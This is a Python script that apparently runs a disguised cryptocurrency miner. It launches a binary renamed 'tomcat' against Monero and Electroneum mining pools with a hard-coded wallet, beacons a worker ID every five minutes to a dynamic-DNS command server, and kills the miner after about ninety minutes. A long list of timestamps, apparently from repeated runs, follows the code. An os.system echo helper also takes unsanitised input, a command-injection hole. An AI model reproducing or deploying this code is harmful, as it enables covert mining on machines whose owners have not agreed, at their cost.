import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:47:02.080426
#2018-02-17 17:34:01.744566
#2018-02-17 19:22:01.723233
#2018-02-17 21:11:04.093156
#2018-02-17 22:54:07.372840
#2018-02-18 00:39:04.882148
#2018-02-18 02:29:01.522938
#2018-02-18 04:16:01.844722
#2018-02-18 06:06:07.002163
#2018-02-18 07:57:06.956007
#2018-02-18 09:46:06.859097
#2018-02-18 11:32:06.668571
#2018-02-18 13:18:02.038418
#2018-02-18 15:08:03.636814
#2018-02-18 16:56:06.095426
#2018-02-18 18:45:06.347520
#2018-02-18 20:31:05.341909
#2018-02-18 22:17:07.230705
#2018-02-19 00:08:02.268027
#2018-02-19 01:54:03.955759
#2018-02-19 03:41:02.096397
#2018-02-19 05:26:01.560255
#2018-02-19 07:15:07.335313
#2018-02-19 09:05:03.906246
#2018-02-19 10:53:08.514535
#2018-02-19 12:43:08.906997
#2018-02-19 14:31:04.977861
#2018-02-19 16:19:04.016241
#2018-02-19 18:05:09.603133
#2018-02-19 19:53:01.808246
#2018-02-19 21:40:07.261813
#2018-02-19 23:26:01.892266
#2018-02-20 01:12:01.369148
#2018-02-20 03:02:02.095081
#2018-02-20 04:48:07.412256
#2018-02-20 06:32:07.778345
#2018-02-20 08:16:04.722370
#2018-02-20 10:01:05.713443
#2018-02-20 11:47:01.809112
#2018-02-20 13:35:02.851636
#2018-02-20 15:18:08.909097
#2018-02-20 17:05:07.622465
#2018-02-20 18:54:01.660811
#2018-02-20 20:44:04.090488
#2018-02-20 22:28:05.053842
#2018-02-21 00:10:06.561788
#2018-02-21 01:55:07.245673
#2018-02-21 03:42:06.647089
#2018-02-21 05:30:01.720158
#2018-02-21 07:18:07.851248
#2018-02-21 09:03:04.394336
#2018-02-21 12:43:04.675184
#2018-02-21 14:30:09.075395
#2018-02-21 16:18:07.725471
#2018-02-21 18:08:07.713521
#2018-02-21 19:55:03.035656
#2018-02-21 21:41:05.568225
#2018-02-21 23:28:02.212672
#2018-02-22 01:16:05.327881
#2018-02-22 03:05:08.444738
#2018-02-22 04:51:03.964303
#2018-02-22 06:36:03.438902
#2018-02-22 08:24:06.370826
#2018-02-22 10:12:06.580865
#2018-02-22 11:57:01.959965
#2018-02-22 13:42:01.783058
#2018-02-22 15:31:09.197833
#2018-02-22 17:17:05.075118
#2018-02-22 19:04:05.711536
#2018-02-22 20:56:08.815178
#2018-02-22 22:43:06.998105
#2018-02-23 00:31:06.271273
#2018-02-23 02:18:04.823627
#2018-02-23 04:07:06.440576
#2018-02-23 05:54:05.491846
#2018-02-23 07:44:07.671681
#2018-02-23 09:51:04.205389
#2018-02-23 11:55:13.180800
#2018-02-23 13:43:07.514416
#2018-02-23 15:33:04.852298
#2018-02-23 17:21:05.982629
#2018-02-23 19:06:04.411038
#2018-02-23 20:50:08.554512
#2018-02-23 22:32:06.609691
#2018-02-24 00:19:03.548144
#2018-02-24 02:09:06.343307
#2018-02-24 03:59:04.033563
#2018-02-24 06:41:05.621980
#2018-02-24 08:30:06.329562
#2018-02-24 10:17:06.586437
#2018-02-24 12:12:04.345898
#2018-02-24 13:58:03.290275
#2018-02-24 15:50:01.693197
#2018-02-24 17:45:06.410707
#2018-02-24 19:29:07.632449
#2018-02-24 21:19:05.967933
#2018-02-24 23:58:06.318573
#2018-02-25 03:16:01.872405
#2018-02-25 06:45:04.920545